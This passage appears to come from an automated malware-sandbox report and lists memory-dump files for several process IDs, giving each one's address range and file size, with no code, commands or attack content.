                                                                                                            • memory/620-2966-0x000000006F640000-0x000000006F68C000-memory.dmp

                                                                                                              Filesize

                                                                                                              304KB

                                                                                                            • memory/620-2978-0x00000000077D0000-0x00000000077DA000-memory.dmp

                                                                                                              Filesize

                                                                                                              40KB

                                                                                                            • memory/620-2979-0x0000000007960000-0x0000000007971000-memory.dmp

                                                                                                              Filesize

                                                                                                              68KB

                                                                                                            • memory/620-2980-0x0000000007990000-0x000000000799E000-memory.dmp

                                                                                                              Filesize

                                                                                                              56KB

                                                                                                            • memory/620-2981-0x00000000079A0000-0x00000000079B4000-memory.dmp

                                                                                                              Filesize

                                                                                                              80KB

                                                                                                            • memory/620-2983-0x0000000007A80000-0x0000000007A88000-memory.dmp

                                                                                                              Filesize

                                                                                                              32KB

                                                                                                            • memory/632-9920-0x0000000000400000-0x0000000000CE3000-memory.dmp

                                                                                                              Filesize

                                                                                                              8.9MB

                                                                                                            • memory/632-9902-0x0000000000400000-0x0000000000CE3000-memory.dmp

                                                                                                              Filesize

                                                                                                              8.9MB

                                                                                                            • memory/1168-21-0x0000000000200000-0x00000000006CA000-memory.dmp

                                                                                                              Filesize

                                                                                                              4.8MB

                                                                                                            • memory/1168-2854-0x0000000000200000-0x00000000006CA000-memory.dmp

                                                                                                              Filesize

                                                                                                              4.8MB

                                                                                                            • memory/1168-1944-0x0000000000200000-0x00000000006CA000-memory.dmp

                                                                                                              Filesize

                                                                                                              4.8MB

                                                                                                            • memory/1168-1164-0x0000000000200000-0x00000000006CA000-memory.dmp

                                                                                                              Filesize

                                                                                                              4.8MB

                                                                                                            • memory/1168-20-0x0000000000200000-0x00000000006CA000-memory.dmp

                                                                                                              Filesize

                                                                                                              4.8MB

                                                                                                            • memory/1168-19-0x0000000000200000-0x00000000006CA000-memory.dmp

                                                                                                              Filesize

                                                                                                              4.8MB

                                                                                                            • memory/1168-16-0x0000000000200000-0x00000000006CA000-memory.dmp

                                                                                                              Filesize

                                                                                                              4.8MB

                                                                                                            • memory/3492-46-0x00000248F3FA0000-0x00000248F40A7000-memory.dmp

                                                                                                              Filesize

                                                                                                              1.0MB

                                                                                                            • memory/3492-102-0x00000248F3FA0000-0x00000248F40A7000-memory.dmp

                                                                                                              Filesize

                                                                                                              1.0MB

                                                                                                            • memory/3492-39-0x00000248D9AC0000-0x00000248D9B68000-memory.dmp

                                                                                                              Filesize

                                                                                                              672KB

                                                                                                            • memory/3492-40-0x00000248F3FA0000-0x00000248F40AA000-memory.dmp

                                                                                                              Filesize

                                                                                                              1.0MB

                                                                                                            • memory/3492-74-0x00000248F3FA0000-0x00000248F40A7000-memory.dmp

                                                                                                              Filesize

                                                                                                              1.0MB

                                                                                                            • memory/3492-78-0x00000248F3FA0000-0x00000248F40A7000-memory.dmp

                                                                                                              Filesize

                                                                                                              1.0MB

                                                                                                            • memory/3492-100-0x00000248F3FA0000-0x00000248F40A7000-memory.dmp

                                                                                                              Filesize

                                                                                                              1.0MB

                                                                                                            • memory/3492-98-0x00000248F3FA0000-0x00000248F40A7000-memory.dmp

                                                                                                              Filesize

                                                                                                              1.0MB

                                                                                                            • memory/3492-96-0x00000248F3FA0000-0x00000248F40A7000-memory.dmp

                                                                                                              Filesize

                                                                                                              1.0MB

                                                                                                            • memory/3492-95-0x00000248F3FA0000-0x00000248F40A7000-memory.dmp

                                                                                                              Filesize

                                                                                                              1.0MB

                                                                                                            • memory/3492-90-0x00000248F3FA0000-0x00000248F40A7000-memory.dmp

                                                                                                              Filesize

                                                                                                              1.0MB

                                                                                                            • memory/3492-86-0x00000248F3FA0000-0x00000248F40A7000-memory.dmp

                                                                                                              Filesize

                                                                                                              1.0MB

                                                                                                            • memory/3492-84-0x00000248F3FA0000-0x00000248F40A7000-memory.dmp

                                                                                                              Filesize

                                                                                                              1.0MB

                                                                                                            • memory/3492-82-0x00000248F3FA0000-0x00000248F40A7000-memory.dmp

                                                                                                              Filesize

                                                                                                              1.0MB

                                                                                                            • memory/3492-80-0x00000248F3FA0000-0x00000248F40A7000-memory.dmp

                                                                                                              Filesize

                                                                                                              1.0MB

                                                                                                            • memory/3492-76-0x00000248F3FA0000-0x00000248F40A7000-memory.dmp

                                                                                                              Filesize

                                                                                                              1.0MB

                                                                                                            • memory/3492-72-0x00000248F3FA0000-0x00000248F40A7000-memory.dmp

                                                                                                              Filesize

                                                                                                              1.0MB

                                                                                                            • memory/3492-70-0x00000248F3FA0000-0x00000248F40A7000-memory.dmp

                                                                                                              Filesize

                                                                                                              1.0MB

                                                                                                            • memory/3492-2855-0x00000248F42B0000-0x00000248F4304000-memory.dmp

                                                                                                              Filesize

                                                                                                              336KB

                                                                                                            • memory/3492-68-0x00000248F3FA0000-0x00000248F40A7000-memory.dmp

                                                                                                              Filesize

                                                                                                              1.0MB

                                                                                                            • memory/3492-2850-0x00000248F4100000-0x00000248F4156000-memory.dmp

                                                                                                              Filesize

                                                                                                              344KB

                                                                                                            • memory/3492-2851-0x00000248F4160000-0x00000248F41AC000-memory.dmp

                                                                                                              Filesize

                                                                                                              304KB

                                                                                                            • memory/3492-66-0x00000248F3FA0000-0x00000248F40A7000-memory.dmp

                                                                                                              Filesize

                                                                                                              1.0MB

                                                                                                            • memory/3492-64-0x00000248F3FA0000-0x00000248F40A7000-memory.dmp

                                                                                                              Filesize

                                                                                                              1.0MB

                                                                                                            • memory/3492-41-0x00000248F3FA0000-0x00000248F40A7000-memory.dmp

                                                                                                              Filesize

                                                                                                              1.0MB

                                                                                                            • memory/3492-52-0x00000248F3FA0000-0x00000248F40A7000-memory.dmp

                                                                                                              Filesize

                                                                                                              1.0MB

                                                                                                            • memory/3492-88-0x00000248F3FA0000-0x00000248F40A7000-memory.dmp

                                                                                                              Filesize

                                                                                                              1.0MB

                                                                                                            • memory/3492-92-0x00000248F3FA0000-0x00000248F40A7000-memory.dmp

                                                                                                              Filesize

                                                                                                              1.0MB

                                                                                                            • memory/3492-43-0x00000248F3FA0000-0x00000248F40A7000-memory.dmp

                                                                                                              Filesize

                                                                                                              1.0MB

                                                                                                            • memory/3492-44-0x00000248F3FA0000-0x00000248F40A7000-memory.dmp

                                                                                                              Filesize

                                                                                                              1.0MB

                                                                                                            • memory/3492-62-0x00000248F3FA0000-0x00000248F40A7000-memory.dmp

                                                                                                              Filesize

                                                                                                              1.0MB

                                                                                                            • memory/3492-48-0x00000248F3FA0000-0x00000248F40A7000-memory.dmp

                                                                                                              Filesize

                                                                                                              1.0MB

                                                                                                            • memory/3492-50-0x00000248F3FA0000-0x00000248F40A7000-memory.dmp

                                                                                                              Filesize

                                                                                                              1.0MB

                                                                                                            • memory/3492-54-0x00000248F3FA0000-0x00000248F40A7000-memory.dmp

                                                                                                              Filesize

                                                                                                              1.0MB

                                                                                                            • memory/3492-56-0x00000248F3FA0000-0x00000248F40A7000-memory.dmp

                                                                                                              Filesize

                                                                                                              1.0MB

                                                                                                            • memory/3492-58-0x00000248F3FA0000-0x00000248F40A7000-memory.dmp

                                                                                                              Filesize

                                                                                                              1.0MB

                                                                                                            • memory/3492-60-0x00000248F3FA0000-0x00000248F40A7000-memory.dmp

                                                                                                              Filesize

                                                                                                              1.0MB

                                                                                                            • memory/4636-0-0x00000000002E0000-0x00000000007AA000-memory.dmp

                                                                                                              Filesize

                                                                                                              4.8MB

                                                                                                            • memory/4636-1-0x0000000077374000-0x0000000077376000-memory.dmp

                                                                                                              Filesize

                                                                                                              8KB

                                                                                                            • memory/4636-2-0x00000000002E1000-0x000000000030F000-memory.dmp

                                                                                                              Filesize

                                                                                                              184KB

                                                                                                            • memory/4636-3-0x00000000002E0000-0x00000000007AA000-memory.dmp

                                                                                                              Filesize

                                                                                                              4.8MB

                                                                                                            • memory/4636-4-0x00000000002E0000-0x00000000007AA000-memory.dmp

                                                                                                              Filesize

                                                                                                              4.8MB

                                                                                                            • memory/4636-18-0x00000000002E0000-0x00000000007AA000-memory.dmp

                                                                                                              Filesize

                                                                                                              4.8MB

                                                                                                            • memory/5880-2986-0x000000000CFE0000-0x000000000D134000-memory.dmp

                                                                                                              Filesize

                                                                                                              1.3MB

                                                                                                            • memory/5880-2927-0x0000000007C40000-0x0000000007CD2000-memory.dmp

                                                                                                              Filesize

                                                                                                              584KB

                                                                                                            • memory/5880-2922-0x0000000006D70000-0x0000000006D8A000-memory.dmp

                                                                                                              Filesize

                                                                                                              104KB

                                                                                                            • memory/5880-2923-0x0000000007B00000-0x0000000007B96000-memory.dmp

                                                                                                              Filesize

                                                                                                              600KB

                                                                                                            • memory/5880-2924-0x0000000007A20000-0x0000000007A42000-memory.dmp

                                                                                                              Filesize

                                                                                                              136KB

                                                                                                            • memory/5880-2921-0x0000000008180000-0x00000000087FA000-memory.dmp

                                                                                                              Filesize

                                                                                                              6.5MB

                                                                                                            • memory/5880-2907-0x00000000062F0000-0x0000000006356000-memory.dmp

                                                                                                              Filesize

                                                                                                              408KB

                                                                                                            • memory/5880-2920-0x0000000006880000-0x00000000068CC000-memory.dmp

                                                                                                              Filesize

                                                                                                              304KB

                                                                                                            • memory/5880-2917-0x0000000006360000-0x00000000066B4000-memory.dmp

                                                                                                              Filesize

                                                                                                              3.3MB

                                                                                                            • memory/5880-2903-0x0000000005490000-0x00000000054C6000-memory.dmp

                                                                                                              Filesize

                                                                                                              216KB

                                                                                                            • memory/5880-2993-0x000000000DA10000-0x000000000DA5E000-memory.dmp

                                                                                                              Filesize

                                                                                                              312KB

                                                                                                            • memory/5880-2992-0x000000000D780000-0x000000000D942000-memory.dmp

                                                                                                              Filesize

                                                                                                              1.8MB

                                                                                                            • memory/5880-2991-0x000000000D4F0000-0x000000000D5A2000-memory.dmp

                                                                                                              Filesize

                                                                                                              712KB

                                                                                                            • memory/5880-2990-0x000000000D3E0000-0x000000000D430000-memory.dmp

                                                                                                              Filesize

                                                                                                              320KB

                                                                                                            • memory/5880-2988-0x000000000D270000-0x000000000D27A000-memory.dmp

                                                                                                              Filesize

                                                                                                              40KB

                                                                                                            • memory/5880-2987-0x00000000057C0000-0x00000000057DA000-memory.dmp

                                                                                                              Filesize

                                                                                                              104KB

                                                                                                            • memory/5880-2906-0x0000000006280000-0x00000000062E6000-memory.dmp

                                                                                                              Filesize

                                                                                                              408KB

                                                                                                            • memory/5880-2925-0x0000000008800000-0x0000000008DA4000-memory.dmp

                                                                                                              Filesize

                                                                                                              5.6MB

                                                                                                            • memory/5880-2905-0x0000000005AA0000-0x0000000005AC2000-memory.dmp

                                                                                                              Filesize

                                                                                                              136KB

                                                                                                            • memory/5880-2919-0x0000000006830000-0x000000000684E000-memory.dmp

                                                                                                              Filesize

                                                                                                              120KB

                                                                                                            • memory/5880-2928-0x0000000001710000-0x0000000001718000-memory.dmp

                                                                                                              Filesize

                                                                                                              32KB

                                                                                                            • memory/5880-2929-0x0000000007ED0000-0x0000000007FC8000-memory.dmp

                                                                                                              Filesize

                                                                                                              992KB

                                                                                                            • memory/5880-2904-0x0000000005BE0000-0x0000000006208000-memory.dmp

                                                                                                              Filesize

                                                                                                              6.2MB

                                                                                                            • memory/6072-9882-0x0000000000200000-0x00000000006CA000-memory.dmp

                                                                                                              Filesize

                                                                                                              4.8MB

                                                                                                            • memory/6072-9884-0x0000000000200000-0x00000000006CA000-memory.dmp

                                                                                                              Filesize

                                                                                                              4.8MB

                                                                                                            • memory/6904-2865-0x0000026CFFB80000-0x0000026CFFBA2000-memory.dmp

                                                                                                              Filesize

                                                                                                              136KB

                                                                                                            • memory/7060-2867-0x0000000000200000-0x00000000006CA000-memory.dmp

                                                                                                              Filesize

                                                                                                              4.8MB

                                                                                                            • memory/7060-2871-0x0000000000200000-0x00000000006CA000-memory.dmp

                                                                                                              Filesize

                                                                                                              4.8MB

                                                                                                            • memory/7076-9811-0x00000140E6910000-0x00000140E692C000-memory.dmp

                                                                                                              Filesize

                                                                                                              112KB

                                                                                                            • memory/7076-9826-0x00000140E6A70000-0x00000140E6A7A000-memory.dmp

                                                                                                              Filesize

                                                                                                              40KB

                                                                                                            • memory/7076-9857-0x00000140E6A90000-0x00000140E6A9A000-memory.dmp

                                                                                                              Filesize

                                                                                                              40KB

                                                                                                            • memory/7076-9829-0x00000140E6A80000-0x00000140E6A88000-memory.dmp

                                                                                                              Filesize

                                                                                                              32KB

                                                                                                            • memory/10576-10307-0x0000000000E10000-0x00000000012B0000-memory.dmp

                                                                                                              Filesize

                                                                                                              4.6MB

                                                                                                            • memory/10576-10249-0x0000000000E10000-0x00000000012B0000-memory.dmp

                                                                                                              Filesize

                                                                                                              4.6MB

                                                                                                            • memory/11500-10371-0x0000000000400000-0x000000000040E000-memory.dmp

                                                                                                              Filesize

                                                                                                              56KB

                                                                                                            • memory/11500-10372-0x0000000004E90000-0x0000000004F2C000-memory.dmp

                                                                                                              Filesize

                                                                                                              624KB

                                                                                                            • memory/11724-10393-0x0000000000200000-0x00000000006CA000-memory.dmp

                                                                                                              Filesize

                                                                                                              4.8MB

                                                                                                            • memory/11724-10409-0x0000000000200000-0x00000000006CA000-memory.dmp

                                                                                                              Filesize

                                                                                                              4.8MB